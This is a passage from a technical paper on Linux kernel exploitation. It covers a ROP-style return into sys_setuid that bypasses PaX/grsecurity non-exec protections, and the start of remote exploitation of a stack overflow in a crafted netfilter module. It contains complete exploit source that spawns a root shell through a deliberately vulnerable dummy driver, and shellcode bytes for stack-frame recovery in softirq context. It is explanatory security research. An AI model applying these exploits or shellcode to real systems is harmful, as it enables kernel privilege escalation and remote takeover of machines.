sys_setuid is a system call, so, due to the systemcall convention,
parameters are passed in registers. More precisely, 'uid' will be passed
in '%ebx'. The idea is simple (and not different from 'ret-into-libc'
[19] or other userspace page protection evading techniques like [20]) :
if we manage to have 0 in %ebx and to jump right in the middle of
sys_setuid (and right after the checks) we should be able to change the
'euid' and 'fsuid' of our process and thus raise our privileges.


Let's see the sys_setuid disassembly to better tune our idea :


[...]
c0120fd0:       b8 00 e0 ff ff          mov    $0xffffe000,%eax     [1]
c0120fd5:       21 e0                   and    %esp,%eax
c0120fd7:       8b 10                   mov    (%eax),%edx
c0120fd9:       89 9a 6c 01 00 00       mov    %ebx,0x16c(%edx)     [2]
c0120fdf:       89 9a 74 01 00 00       mov    %ebx,0x174(%edx)
c0120fe5:       8b 00                   mov    (%eax),%eax
c0120fe7:       89 b0 70 01 00 00       mov    %esi,0x170(%eax)
c0120fed:       6a 01                   push   $0x1
c0120fef:       8b 44 24 04             mov    0x4(%esp),%eax
c0120ff3:       50                      push   %eax
c0120ff4:       55                      push   %ebp
c0120ff5:       57                      push   %edi
c0120ff6:       e8 65 ce 0c 00          call   c01ede60
c0120ffb:       89 c2                   mov    %eax,%edx
c0120ffd:       83 c4 10                add    $0x10,%esp           [3]
c0121000:       89 d0                   mov    %edx,%eax
c0121002:       5e                      pop    %esi
c0121003:       5b                      pop    %ebx
c0121004:       5e                      pop    %esi
c0121005:       5f                      pop    %edi
c0121006:       5d                      pop    %ebp
c0121007:       c3                      ret


At [1] the pointer to the current process task_struct is derived from the
kernel stack pointer value. At [2] the %ebx value is copied over the
'euid' and 'fsuid' members of the struct. We have our return address,
which is [1].
At that point we need to somehow force %ebx into being 0 (if we're not
lucky enough to have it already zero'ed).
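
The 'mov $0xffffe000,%eax ; and %esp,%eax' pair at [1] is just a mask
operation, sketched below in C. The function name 'kernel_stack_base' is
hypothetical and the example stack pointer values used to exercise it are
made up; the mask corresponds to an 8192-byte kernel stack.

```c
#include <assert.h>
#include <stdint.h>

/* Sketch: round a kernel stack pointer down to the base of its stack
 * area, where the per-thread structure holding the task pointer is
 * kept. stack_size must be a power of two. */
uint32_t kernel_stack_base(uint32_t esp, uint32_t stack_size)
{
    assert(stack_size != 0 && (stack_size & (stack_size - 1)) == 0);
    return esp & ~(stack_size - 1);
}
```

For an 8192-byte stack the mask is 0xffffe000, exactly the immediate seen
in the disassembly; with 4096-byte stacks it would become 0xfffff000, so
the value has to match the configuration of the running kernel.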


To demonstrate this vulnerability we have used the locally exploitable
buffer overflow in the dummy.c driver (KERN_IOCTL_STORE_CHUNK ioctl()
command). Since it's a stack based overflow we can chain multiple return
addresses, preparing a fake stack frame that we totally control.
We need :


 - a zero'ed %ebx : the easiest way to achieve that is to find a pop %ebx
   followed by a ret instruction [we control the stack] :

   ret-to-pop-ebx:
   [*] c0100cd3:       5b                      pop    %ebx
   [*] c0100cd4:       c3                      ret

   we don't strictly need pop %ebx directly followed by ret, we may find a
   sequence of pops before the ret (and, among those, our pop %ebx). It is
   just a matter of preparing the right ZERO-layout for the pop sequence
   (to make it simple, add a ZERO 4-bytes sequence for any pop between the
   %ebx one and the ret)


 - the return addr where to jump, which is the [1] address shown above


 - a 'ret-to-ret' padding to take care of the stack gap created at [3] by
   the function epilogue (%esp adding and register popping) :

   ret-to-ret pad:
   [*] 0xffffe413      c3                      ret

   (we could have used the above ret as well, this one is in the vsyscall
   page and was used in another exploit where we didn't need so much
   knowledge of the kernel .text.. it survived here :) )


 - the address of an iret instruction to return to userland (and a crafted
   stack frame for it, as we described above while discussing 'Stack
   Based' exploitation) :

   ret-to-iret:
   [*] c013403f:       cf                      iret

Putting it all together, this is how our 'stack' should look to perform a
correct exploitation :

    low addresses
    +------------------+
    | ret-to-ret pad   |
    | ret-to-ret pad   |
    | ret-to-pop ebx   |
    | 0x00000000       |
    | ret-to-setuid    |
    | ret-to-ret pad   |
    | ret-to-ret pad   |
    | ret-to-ret pad   |
    | ret-to-iret      |
    | fake-iret-frame  |
    +------------------+
    high addresses

Once correctly returned to userspace we have successfully modified the
'fsuid' and 'euid' values, but our 'ruid' is still the original one. At
that point we simply re-exec ourselves to get euid=0 and then spawn the
shell.

Code follows 


< stuff/expl/grsec_noexec.c > 


#include <sys/ioctl.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>

#include "dummy.h"

#define DEVICE "/dev/dummy"
#define NOP 0x90

#define PAGE_SIZE 0x1000
#define STACK_SIZE 8192
//#define STACK_SIZE 4096

#define STACK_MASK ~(STACK_SIZE - 1)
/* patch it at runtime */

#define ALTERNATE_STACK 0x00BBBBBB

/* 2283d */
#define RET_INTO_RET_STR        "\x3d\x28\x02\x00"
#define DUMMY                   RET_INTO_RET_STR
#define ZERO                    "\x00\x00\x00\x00"
/* 22ad3 */
#define RET_INTO_POP_EBX        "\xd3\x2a\x02\x00"
/* 1360 */
#define RET_INTO_IRET           "\x60\x13\x00\x00"
/* 227fc */
#define RET_INTO_SETUID         "\xfc\x27\x02\x00"

// do_eip at .text offset (to be reviewed)
// 0804864f
#define USER_CODE_OFFSET        "\x4f\x86\x04\x08"
#define USER_CODE_SEGMENT       "\x73\x00\x00\x00"
#define USER_EFLAGS             "\x46\x02\x00\x00"
#define USER_STACK_OFFSET       "\xbb\xbb\xbb\x00"
#define USER_STACK_SEGMENT      "\x7b\x00\x00\x00"


/* sys_setuid grsec kernel */
/*
   227fc:       89 e2                   mov    %esp,%edx
   227fe:       89 f1                   mov    %esi,%ecx
   22800:       81 e2 00 e0 ff ff       and    $0xffffe000,%edx
   22806:       8b 02                   mov    (%edx),%eax
   22808:       89 98 50 01 00 00       mov    %ebx,0x150(%eax)
   2280e:       89 98 58 01 00 00       mov    %ebx,0x158(%eax)
   22814:       8b 02                   mov    (%edx),%eax
   22816:       89 fa                   mov    %edi,%edx
   22818:       89 a8 54 01 00 00       mov    %ebp,0x154(%eax)
   2281e:       c7 44 24 18 01 00 00    movl   $0x1,0x18(%esp)
   22825:       00
   22826:       8b 04 24                mov    (%esp),%eax
   22829:       5d                      pop    %ebp
   2282a:       5b                      pop    %ebx
   2282b:       5e                      pop    %esi
   2282c:       5f                      pop    %edi
   2282d:       5d                      pop    %ebp
   2282e:       e9 ef d5 0c 00          jmp    efe22
<cap_task_post_setuid>
   22833:       83 ca ff                or     $0xffffffff,%edx
   22836:       89 d0                   mov    %edx,%eax
   22838:       5f                      pop    %edi
   22839:       5b                      pop    %ebx
   2283a:       5e                      pop    %esi
   2283b:       5f                      pop    %edi
   2283c:       5d                      pop    %ebp
   2283d:       c3                      ret
*/

/* pop %ebx, ret grsec
 *
 * ffd1a884:       5b                      pop    %ebx
 * ffd1a885:       c3                      ret
 */
char *g_prog_name;

char kern_noexec_shellcode[] =
RET_INTO_RET_STR
RET_INTO_RET_STR
RET_INTO_RET_STR
RET_INTO_RET_STR
RET_INTO_RET_STR
RET_INTO_RET_STR
RET_INTO_RET_STR
RET_INTO_RET_STR
RET_INTO_RET_STR
RET_INTO_RET_STR
RET_INTO_RET_STR
RET_INTO_RET_STR
RET_INTO_RET_STR
RET_INTO_RET_STR
RET_INTO_RET_STR
RET_INTO_RET_STR
RET_INTO_POP_EBX
ZERO
RET_INTO_SETUID
RET_INTO_RET_STR
RET_INTO_RET_STR
RET_INTO_RET_STR
RET_INTO_POP_EBX
RET_INTO_POP_EBX
RET_INTO_POP_EBX
RET_INTO_POP_EBX
RET_INTO_POP_EBX
RET_INTO_POP_EBX
RET_INTO_POP_EBX
RET_INTO_POP_EBX
RET_INTO_RET_STR
RET_INTO_RET_STR
RET_INTO_IRET
USER_CODE_OFFSET
USER_CODE_SEGMENT
USER_EFLAGS
USER_STACK_OFFSET
USER_STACK_SEGMENT
;

void re_exec(int useless)
{
  char *a[3] = { g_prog_name, "exec", NULL };
  execve(g_prog_name, a, NULL);
}


char *allocate_jump_stack(unsigned int jump_addr, unsigned int size)
{
  unsigned int round_addr = jump_addr & 0xFFFFF000;
  unsigned int diff       = jump_addr - round_addr;
  unsigned int len        = (size + diff + 0xFFF) & 0xFFFFF000;

  char *map_addr = mmap((void*)round_addr,
                        len,
                        PROT_READ|PROT_WRITE,
                        MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,
                        0,
                        0);

  if(map_addr == (char*)-1)
    return NULL;

  memset(map_addr, 0x00, len);

  return map_addr;
}


char *allocate_jump_code(unsigned int jump_addr, void* code,
                         unsigned int size)
{
  unsigned int round_addr = jump_addr & 0xFFFFF000;
  unsigned int diff       = jump_addr - round_addr;
  unsigned int len        = (size + diff + 0xFFF) & 0xFFFFF000;

  char *map_addr = mmap((void*)round_addr,
                        len,
                        PROT_READ|PROT_WRITE|PROT_EXEC,
                        MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS,
                        0,
                        0);

  if(map_addr == (char*)-1)
    return NULL;

  memset(map_addr, NOP, len);
  memcpy(map_addr+diff, code, size);

  return map_addr + diff;
}


inline void patch_code_4byte(char *code, unsigned int offset,
                             unsigned int value)
{
  *((unsigned int *)(code + offset)) = value;
}


int main(int argc, char *argv[])
{
  if(argc > 1)
  {
    int ret;
    char *argvx[] = {"/bin/sh", NULL};
    ret = setuid(0);
    printf("euid=%d, ret=%d\n", geteuid(), ret);
    execve("/bin/sh", argvx, NULL);
    exit(1);
  }

  signal(SIGSEGV, re_exec);

  g_prog_name = argv[0];
  char *stack_jump =
    allocate_jump_stack(ALTERNATE_STACK, PAGE_SIZE);

  if(!stack_jump)
  {
    fprintf(stderr, "Exiting: mmap failed");
    exit(1);
  }

  char *memory = malloc(PAGE_SIZE), *mem_orig;
  mem_orig = memory;

  memset(memory, 0xDD, PAGE_SIZE);

  struct device_io_ctl *ptr = (struct device_io_ctl*)memory;
  ptr->chunk_num = 9 + (sizeof(kern_noexec_shellcode)-1) /
                       sizeof(struct device_io_blk) + 1;
  printf("Chunk num: %d\n", ptr->chunk_num);
  ptr->type = 0xFFFFFFFF;

  memory += (sizeof(struct device_io_ctl) +
             sizeof(struct device_io_blk) * 9);

  /* copy shellcode */
  memcpy(memory, kern_noexec_shellcode, sizeof(kern_noexec_shellcode)-1);

  int i, fd = open(DEVICE, O_RDONLY);
  if(fd < 0)
    return 0;

  ioctl(fd, KERN_IOCTL_STORE_CHUNK, (unsigned long)mem_orig);
  return 0;
}


< / > 


As we said, we have chosen the PaX security patches for Linux/x86, but
some of the theory presented works equally well in other situations.

A slightly different exploiting approach was successfully used on
Solaris/SPARC (we leave it as an 'exercise' for the reader ;)).


------[ 3.2 - Remote Kernel Exploiting


Writing a working and somehow reliable remote kernel exploit is an
exciting and interesting challenge. Keeping on with the 'style' of this
paper we're going to propose here a couple of techniques and 'life notes'
that led us to succeed in writing an almost reliable, image
independent and effective remote exploit.


After the first draft of this paper, a couple of things changed, so some
of the information presented here could be outdated in the very latest
kernels (and compiler releases), but it is anyway a good base for the
discussion (we've added notes all around this chapter about changes and
updates in the recent releases of the Linux kernel).

A couple of the ideas presented here converged into a real remote exploit
for the madwifi remote kernel stack buffer overflow [21], that we already
released [22], without examining in too much detail the exploitation
approaches used. This chapter can thus be seen both as the introduction
and the extension of that work.

More precisely we will also cover here the exploiting issues and solutions
when dealing with code running in interrupt context, which is the most
common running mode for network based code (interrupt handler, softirq,
etc) but which wasn't the case for the madwifi exploit.

The same ideas apply well to kernel thread context too.


The exploitation techniques and discussion are based on a stack based
buffer overflow on the Linux 2.6.* branch of kernels on the x86
architecture, but can be reused in most of the conditions that lead us to
take control over the instruction flow.


---[ 3.2.1 - The Network Contest


We begin with a few considerations about the kind of kernel code that
we'll be dealing with. Most of that code runs in interrupt context (and
sometimes in a kernel thread context), so we have some 'limitations' :

 - we can't directly 'return-to-userspace', since we don't have a valid
   current task pointer. Moreover, most of the time, we won't control the
   address space of the userland process we talk with. Nevertheless we can
   rely on some 'fixed' points, like the ELF header (given there's no
   PIE / .text randomization on the remote box)

 - we can't perform any action that might make the kernel path sleep
   (for example a faulting memory access)

 - we can't directly call a system call

 - we have to take into account kernel resource management, since this
   kind of kernel path usually acquires spinlocks or disables pre-emption.
   We have to restore them to a stable state.

Logically, since we are remote, we don't have any information about
struct or kernel path addresses and, since a good infoleak is usually
not a very probable situation, we can't rely on them.


We have prepared a crafted example that will let us introduce all the
techniques involved in solving the problems just stated. We chose to write
a netfilter module, since quite a lot of the network kernel code depends
on it and it's the main framework for third party modules.


< stuff/drivers/linux/remote/dummy_remote.c > 


#define MAX_TWSKCHUNK 30
#define TWSK_PROTO    37

struct twsk_chunk
{
  int type;
  char buff[12];
};

struct twsk
{
  int chunk_num;
  struct twsk_chunk chunk[0];
};


static int process_twsk_chunk(struct sk_buff *buff)
{
  struct twsk_chunk chunks[MAX_TWSKCHUNK];

  struct twsk *ts = (struct twsk *)((char*)buff->nh.iph +
                                    (buff->nh.iph->ihl * 4));

  if (ts->chunk_num > MAX_TWSKCHUNK)                                    [1]
    return (NF_DROP);

  printk(KERN_INFO "Processing TWSK packet: packet frame n. %d\n",
         ts->chunk_num);

  memcpy(chunks, ts->chunk, sizeof(struct twsk_chunk) * ts->chunk_num); [2]

  // do somethings..

  return (NF_ACCEPT);
}

< / >


We have a signedness issue at [1], which triggers a later buffer overflow 
at [2], writing past the local ’chunks’ buffer. 
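
To make the signedness issue concrete, here is a minimal userland sketch
(not part of the module) of what happens to the check at [1] and to the
length computed at [2] when 'chunk_num' is negative. The helper names, the
16-byte chunk size and the 32-bit size arithmetic are assumptions chosen to
mirror the structs above on x86; 'fixed_check_passes()' is just one possible
way to tighten the test.

```c
#include <assert.h>
#include <limits.h>
#include <stdint.h>

#define MAX_CHUNKS 30           /* mirrors MAX_TWSKCHUNK                  */
#define CHUNK_SIZE 16           /* assumed sizeof(struct twsk_chunk), x86 */
#define DEMO_COUNT (INT_MIN + 32)   /* hypothetical negative chunk_num    */

/* The check at [1]: only an upper bound, applied to a signed value. */
static int flawed_check_passes(int chunk_num)
{
    return !(chunk_num > MAX_CHUNKS);
}

/* The length memcpy() would receive at [2] on a 32-bit kernel: the signed
 * count is converted to an unsigned 32-bit value before the multiply, and
 * the product wraps modulo 2^32. */
static uint32_t copy_length_32(int chunk_num)
{
    return (uint32_t)CHUNK_SIZE * (uint32_t)chunk_num;
}

/* One possible fix (an assumption, not the module's code): reject
 * negative counts as well. */
static int fixed_check_passes(int chunk_num)
{
    return chunk_num >= 0 && chunk_num <= MAX_CHUNKS;
}
```

With DEMO_COUNT the flawed check passes, while the wrapped length is 512
bytes, which is more than the 30 * 16 = 480 bytes available in 'chunks'.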

As we just said, we must know everything about the vulnerable function,
that is, when it runs, under which 'context' it runs, what calls what, how
the stack would look, whether there are spinlocks or other control
management objects acquired, etc.


A good starting point is dumping a stack trace at the time our function
is called :


#1  0xc02b5139 in nf_iterate (head=0xc042e4a0, skb=0xc1721ad0, hook=0,  [1]
    indev=0xc1224400, outdev=0x0, i=0xc1721a88,
    okfn=0xc02bb150 <ip_rcv_finish>, hook_thresh=-2147483648)
    at net/netfilter/core.c:89
#2  0xc02b51b9 in nf_hook_slow (pf=2, hook=1, pskb=0xc1721ad0,         [2]
    indev=0xc1224400, outdev=0x0, okfn=0xc02bb150 <ip_rcv_finish>,
    hook_thresh=-2147483648) at net/netfilter/core.c:125
#3  0xc02baee3 in ip_rcv (skb=0xc1bc4a40, dev=0xc1224400, pt=0xc0399310,
    orig_dev=0xc1224400) at net/ipv4/ip_input.c:348
#4  0xc02a5432 in netif_receive_skb (skb=0xc1bc4a40) at
    net/core/dev.c:1657
#5  0xc024d3c2 in rtl8139_rx (dev=0xc1224400, tp=0xc1224660, budget=64)
    at drivers/net/8139too.c:2030
#6  0xc024d70e in rtl8139_poll (dev=0xc1224400, budget=0xc1721b78)
    at drivers/net/8139too.c:2120
#7  0xc02a5633 in net_rx_action (h=0xc0417078) at net/core/dev.c:1739
#8  0xc0118a75 in __do_softirq () at kernel/softirq.c:95
#9  0xc0118aba in do_softirq () at kernel/softirq.c:129               [3]
#10 0xc0118b7d in irq_exit () at kernel/softirq.c:169
#11 0xc0104212 in do_IRQ (regs=0xc1721ad0) at arch/i386/kernel/irq.c:110
#12 0xc0102b0a in common_interrupt () at current.h:9
#13 0x0000110b in ?? ()


Our vulnerable function (just like any other hook) is called serially by 
the nf_iterate one [1], during the processing of a softirq [3], through 
the netfilter core interface nf_hook_slow [2]. 

It is installed in the INPUT chain and, thus, it starts processing packets 
whenever they are sent to the host box, as we see from [2] where pf = 2 
(PF_INET) and hook = 1 (NF_IP_LOCAL_IN). 


Our final goal is to execute some kind of code that will establish a
connection back to us (or bind a port to a shell, or whatever kind of
shellcoding you like more for your remote exploit). Trying to execute it
directly from kernel land is obviously a painful idea so we need to hijack
some userland process (remember that we are on top of a softirq, so we
have no clue about what's really beneath us; it could equally be a kernel
thread or the idle task, for example) as our victim, to inject some code
inside and force the kernel to call it later on, when we're out of an
asynchronous event.


That means that we need an intermediate step between taking control
over the flow at 'softirq time' and executing from the userland process.
But let's go in order, first of all we need to _start executing_ at least
the entry point of our shellcode.


As is nowadays done in many exploits that have to fight against address
space randomization in the absence of infoleaks, we look for a
jmp *%esp or push reg/ret or call reg sequence, to start executing from a
known point.

To avoid guessing the right return value a nop-alike padding of
ret-into-ret addresses can be used. But we still need to find those
opcodes in a 'fixed' and known place.


The 2.6.* branch of the kernel introduced a fixed page [*] to support
the 'sysenter' instruction, the 'vsyscall' one :

bfe37000-bfe4d000 rwxp bfe37000 00:00 0          [stack]
ffffe000-fffff000 ---p 00000000 00:00 0          [vdso]

which is located at a fixed address : 0xffffe000 - 0xfffff000.

[*] At time of release this is no longer true on the latest kernels, since
    the address of the vsyscall page is randomized starting from the
    2.6.18 kernel.


The 'vsyscall' page is a godsend for our 'entry point' shellcode, since we
can locate inside it the required opcodes [*] to start executing :

(gdb) x/i 0xffffe75f
0xffffe75f:     jmp    *%esp
(gdb) x/i 0xffffe420
0xffffe420:     ret


[*] After testing on a wide range of kernels/compilers the addresses of 
those opcodes we discovered that sometimes they were not in the 
expected place or, even, in one case, not present. This could be the 
only guessing part you could be facing (also due to vsyscall 
randomization, as we said in the note before), but there are 
(depending on situations) other possibilities [fixed start of the 
kernel image, fixed .text of the ’running process’ if out of interrupt 
context, etc]. 


To better figure out how the layout of the stack should be after the
overflow, here is a small schema :

+-------------+
|             |
| JMP -N      |-------+     # N is the size of the buffer plus some bytes
|             |       |       (ret-to-ret chain + jmp space)
|             |       |
| ret-to-jmp  |<-+    |     # the address of the jmp *%esp inside vsyscall
|             |  |    |
| ret-to-ret  | -+    |     # the address of 'ret' inside vsyscall
|             |  |    |
| ret-to-ret  | -+    |
|             |       |
| overwritten |       |     # ret-to-ret padding starting from there
| ret address |       |
|             |       |
|      ^      |       |
|      |      |       |     # shellcode is placed inside the buffer
|             |       |       because it's huge, but it could also be
|  shellcode  |       |       split before and after the ret addr.
|   nop       |       |
|   nop       |<------+
+-------------+

At that point we control the flow, but we're still inside the softirq, so
we need to perform a couple of tasks to cleanly get our connect-back
shellcode executed :

 - find a way to cleanly get out from the softirq, since we trashed the
   stack

 - locate the resource management objects that have been modified (if
   they've been) and restore them to a safe state

 - find a place where we can store our shellcode until later execution
   from a 'process context' kernel path.

 - find a way to force the aforementioned kernel path to execute our
   shellcode


The first step is the most difficult one (and wasn't necessary in the
madwifi exploit, since we weren't in interrupt context), because we've
overwritten the original return pointer and we have no clue about the
kernel text layout and addresses.


We're now going to present techniques and a working shellcode for each one
of the above points. [ Note that we have mentioned them in a 'conceptual
order of importance', which is different from the real order that we use
inside the exploit. More precisely, they are almost in reverse order,
since the last step performed by our shellcode is effectively getting out
from the softirq. We felt this approach was easier to explain, just
remember this note during the following sub-chapters ]


---[ 3.2.2 - Stack Frame Flow Recovery


The goal of this technique is to unroll the stack, looking for some known
pattern and trying to reconstruct a caller stack frame, register status
and instruction pointer, just to continue with the normal flow.

We need to restore the stack pointer to a known and consistent state,
restore register contents so that the function flow will exit cleanly and
restore any lock or other synchronization object that was modified by the
functions between the one we overflowed in and the one we want to 'return
to'.


Our stack layout (as seen from the dump pasted above) would basically be
this one :

stack layout
+---------------------+   bottom of stack
|                     |
| do_softirq()        |
| ..........          |       /* nf_hook_slow() stack frame */
| ..........          |       +------------------------+
|                     |       |  argN                  |
|                     |       |  ...                   |
|  ip_rcv             |       |  arg2                  |
|  nf_hook_slow       | ====> |  arg1                  |
|  ip_rcv_finish      |       |  ret-to-(ip_rcv())     |
|  nf_iterate         |       |  saved reg1            |
|                     |       |  saved reg2            |
|                     |       |  ......                |
|  ..............     |       +------------------------+
|  process_twsk_chunk |
|                     |
+---------------------+   top of stack


As we said, we need to locate a function in the previous stack frames, not 
too far from our overflowing one, having some ’good pattern’ that would 
help us in our search. 

Our best bet, in that situation, is to check parameter passing :

#2  0xc02b51b9 in nf_hook_slow (pf=2, hook=1, pskb=0xc1721ad0,
    indev=0xc1224400, outdev=0x0, ....)

The 'nf_hook_slow()' function has a good 'signature' :

 - two consecutive dwords 0x00000002 and 0x00000001
 - two kernel pointers (dword > 0xC0000000)
 - a following NULL dword

We can rely on the fact that this pattern would be a constant, since
we're in the INPUT chain, processing incoming packets, and thus always
having a NULL 'outdev', pf = 2 and hook = 1.

Parameter passing is logically not the only 'signature' possible :
depending on the situation you could find a common pattern in some local
variable (which would be an even better one, because we discovered that
some versions of GCC optimize out some parameters, passing them through
registers).


Scanning the stack backward from the process_twsk_chunk() frame up to
the nf_hook_slow() one, we can later set the %esp value to the place where
the return address of nf_hook_slow() is saved and, once the correct
conditions are recreated, perform a 'ret' that would let us exit cleanly.

We said 'once the correct conditions are recreated' because the function
could expect some values inside registers (that we have to set) and could
expect some 'lock' or 'preemption set' different from the one we had at
the time of overflowing. Our task is thus to emulate/restore all those
requirements.


To achieve that, we can start checking how gcc restores registers during
the function epilogue :

c02b6b30 <nf_hook_slow>:
c02b6b30:       55                      push   %ebp
c02b6b31:       57                      push   %edi
c02b6b32:       56                      push   %esi
c02b6b33:       53                      push   %ebx
[...]
c02b6bdb:       89 d8                   mov    %ebx,%eax
c02b6bdd:       5a                      pop    %edx     ==+
c02b6bde:       5b                      pop    %ebx       |
c02b6bdf:       5e                      pop    %esi       | restore
c02b6be0:       5f                      pop    %edi       |
c02b6be1:       5d                      pop    %ebp     ==+
c02b6be2:       c3                      ret


This kind of epilogue, which is common for non-short functions, lets us
recover the state of the saved registers. Once we have found the 'ret'
value on the stack we can start 'rolling back', counting how many 'pop'
instructions there are inside the text, to correctly restore those
registers. [*]

[*] This is logically not the only possibility, one could set the values
    directly via movl, but sometimes you can't use 'predefined' values for
    those registers. As a side note, some versions of the gcc compiler
    don't use the push/pop prologue/epilogue, but translate the code as a
    sequence of movl (which needs different handling in the shellcode).


To correctly do the 'unrolling' (and thus locate the pop sequence), we
need the kernel address of 'nf_hook_slow()'. This one is not hard to
calculate since we have already found its return addr on the stack (thanks
to the signature pointed out before). Once again it is the intel calling
convention which helps us :

[...]
c02bc8bd:       6a 02                   push   $0x2
c02bc8bf:       e8 6c a2 ff ff          call   c02b6b30 <nf_hook_slow>
c02bc8c4:       83 c4 1c                add    $0x1c,%esp
[...]


That small snippet of code is taken from ip_rcv(), which is the function
calling nf_hook_slow(). We have found the return address on the stack,
which is 0xc02bc8c4, so calculating the nf_hook_slow address is just a
matter of reading the 'displacement' used in the relative call (opcode
0xe8, the standard call encoding in gcc-compiled kernel code) and
adding it to the return address value (the INTEL relative call adds
the displacement to the EIP of the next instruction) :

[*] call to nf_hook_slow -> 0xe8 0x6c 0xa2 0xff 0xff
[*] nf_hook_slow address -> 0xc02bc8c4 + 0xffffa26c = 0xc02b6b30
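
The same arithmetic can be checked in a few lines of userland C. This is
only a sketch of the address calculation, not exploit code: the helper name
'call_rel32_target()' is ours, and it assumes a 5-byte 'call rel32'
(opcode 0xe8) sitting right before the return address.

```c
#include <assert.h>
#include <stdint.h>

/* Decode the target of an x86 "call rel32" given the return address the
 * call pushed and the 5 instruction bytes that precede that address.
 * The displacement is a little-endian 32-bit value relative to the
 * address of the next instruction, i.e. the return address itself. */
static uint32_t call_rel32_target(uint32_t ret_addr, const uint8_t insn[5])
{
    assert(insn[0] == 0xe8);            /* only the rel32 form is handled */

    uint32_t disp = (uint32_t)insn[1]
                  | ((uint32_t)insn[2] << 8)
                  | ((uint32_t)insn[3] << 16)
                  | ((uint32_t)insn[4] << 24);

    return ret_addr + disp;             /* wraps modulo 2^32 */
}
```

Feeding it the bytes e8 6c a2 ff ff and the return address 0xc02bc8c4 gives
back 0xc02b6b30, the nf_hook_slow() entry point shown in the listing above.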


To better understand the whole Stack Frame Flow Recovery approach here's
the shellcode stub doing it, with short comments :

 - Here we increment the stack pointer with the 'pop %eax' sequence and
   test for the known signature [ 0x2 0x1 X X 0x0 ].

 loop:
 "\x58"                      // pop    %eax
 "\x83\x3c\x24\x02"          // cmpl   $0x2,(%esp)
 "\x75\xf9"                  // jne    loop
 "\x83\x7c\x24\x04\x01"      // cmpl   $0x1,0x4(%esp)
 "\x75\xf2"                  // jne    loop
 "\x83\x7c\x24\x10\x00"      // cmpl   $0x0,0x10(%esp)
 "\x75\xeb"                  // jne    loop
 "\x8d\x64\x24\xfc"          // lea    0xfffffffc(%esp),%esp

 - get the return address, subtract 4 bytes and dereference the pointer to
   get the nf_hook_slow() offset/displacement. Add it to the return
   address to obtain the nf_hook_slow() address.

 "\x8b\x04\x24"              // mov    (%esp),%eax
 "\x89\xc3"                  // mov    %eax,%ebx
 "\x03\x43\xfc"              // add    0xfffffffc(%ebx),%eax

 - locate the 0xc3 opcode inside nf_hook_slow(), eliminating 'spurious'
   0xc3 bytes. In this shellcode we do a simple check for 'movl' opcodes
   and that's enough to avoid 'false positives'. With a larger shellcode
   one could write a small disassembly routine that would locate the
   'ret' and 'pop' more precisely [see later].

 increment:
 "\x40"                      // inc    %eax
 "\x8a\x18"                  // mov    (%eax),%bl
 "\x80\xfb\xc3"              // cmp    $0xc3,%bl
 "\x75\xf8"                  // jne    increment
 "\x80\x78\xff\x88"          // cmpb   $0x88,0xffffffff(%eax)
 "\x74\xf2"                  // je     increment
 "\x80\x78\xff\x89"          // cmpb   $0x89,0xffffffff(%eax)
 "\x74\xec"                  // je     increment

 - roll back from the located 'ret' up to the last pop instruction, if
   any, and count the number of 'pop's.

 pop:
 "\x31\xc9"                  // xor    %ecx,%ecx
 "\x48"                      // dec    %eax
 "\x8a\x18"                  // mov    (%eax),%bl
 "\x80\xe3\xf0"              // and    $0xf0,%bl
 "\x80\xfb\x50"              // cmp    $0x50,%bl
 "\x75\x03"                  // jne    end
 "\x41"                      // inc    %ecx
 "\xeb\xf2"                  // jmp    pop
 "\x40"                      // inc    %eax

 - use the calculated byte displacement from ret to roll back the %esp
   value

 "\x89\xc6"                  // mov    %eax,%esi
 "\x31\xc0"                  // xor    %eax,%eax
 "\xb0\x04"                  // mov    $0x4,%al
 "\xf7\xe1"                  // mul    %ecx
 "\x29\xc4"                  // sub    %eax,%esp

 - set the return value

 "\x31\xc0"                  // xor    %eax,%eax

 - call the nf_hook_slow() function epilogue

 "\xff\xe6"                  // jmp    *%esi


It is now time to pass to the ’second step’, that is restore any pending 
lock or other synchronization object to a consistent state for the 
nf_hook_slow() function. 
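
Before moving on, the two searches performed by the recovery stub (the
stack signature scan and the pop counting) can be restated as plain C
working on ordinary arrays. This is only an illustrative model under our
own assumptions: the helper names are hypothetical, the 'stack' is a dword
array and the 'text' is a byte array. Note that the sketch matches only the
real one-byte pop opcodes (0x58..0x5f), while the stub's 'and $0xf0' test
is looser and also accepts the push range 0x50..0x57.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Return the index of the first dword where the nf_hook_slow() argument
 * signature [ 0x2 0x1 X X 0x0 ] starts, or -1 if it is not present.
 * The saved return address is the dword right before that index. */
static long find_signature(const uint32_t *stack, size_t ndwords)
{
    assert(stack != NULL);
    for (size_t i = 0; i + 4 < ndwords; i++) {
        if (stack[i] == 2 && stack[i + 1] == 1 && stack[i + 4] == 0)
            return (long)i;
    }
    return -1;
}

/* Count the one-byte "pop reg" opcodes immediately preceding the ret
 * (0xc3) found at text[ret_off]. Each counted pop corresponds to one
 * saved register, i.e. 4 bytes of stack to roll back on x86. */
static unsigned count_pops_before_ret(const uint8_t *text, size_t ret_off)
{
    assert(text != NULL && text[ret_off] == 0xc3);
    unsigned n = 0;
    while (n < ret_off && (text[ret_off - 1 - n] & 0xf8) == 0x58)
        n++;
    return n;
}
```

On the epilogue shown earlier (89 d8 5a 5b 5e 5f 5d c3) the second helper
counts five pops, so the stack pointer has to be moved back by 5 * 4 bytes
from the slot holding the return address.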


---[ 3.2.3 - Resource Restoring


In this phase we take care of restoring those resources that are necessary
for the 'hooked return function' (and its callers) to cleanly get out from
the softirq/interrupt state.


Let's take another (closer) look at nf_hook_slow() :

< linux-2.6.15/net/netfilter/core.c >

int nf_hook_slow(int pf, unsigned int hook, struct sk_buff **pskb,
                 struct net_device *indev,
                 struct net_device *outdev,
                 int (*okfn)(struct sk_buff *),
                 int hook_thresh)
{
        struct list_head *elem;
        unsigned int verdict;
        int ret = 0;

        /* We may already have this, but read-locks nest anyway */
        rcu_read_lock();                                            [1]

[...]

unlock:
        rcu_read_unlock();                                          [2]
        return ret;                                                 [3]
}

< / >

At [1] 'rcu_read_lock()' is invoked/acquired, but [2] 'rcu_read_unlock()'
is never performed, since at the 'Stack Frame Flow Recovery' step we
unrolled the stack and jumped back at [3].

'rcu_read_unlock()' is just an alias of preempt_enable(), which, in the
end, results in a one-decrement of the preempt_count value inside the
thread_info struct :

< linux-2.6.15/include/linux/rcupdate.h >

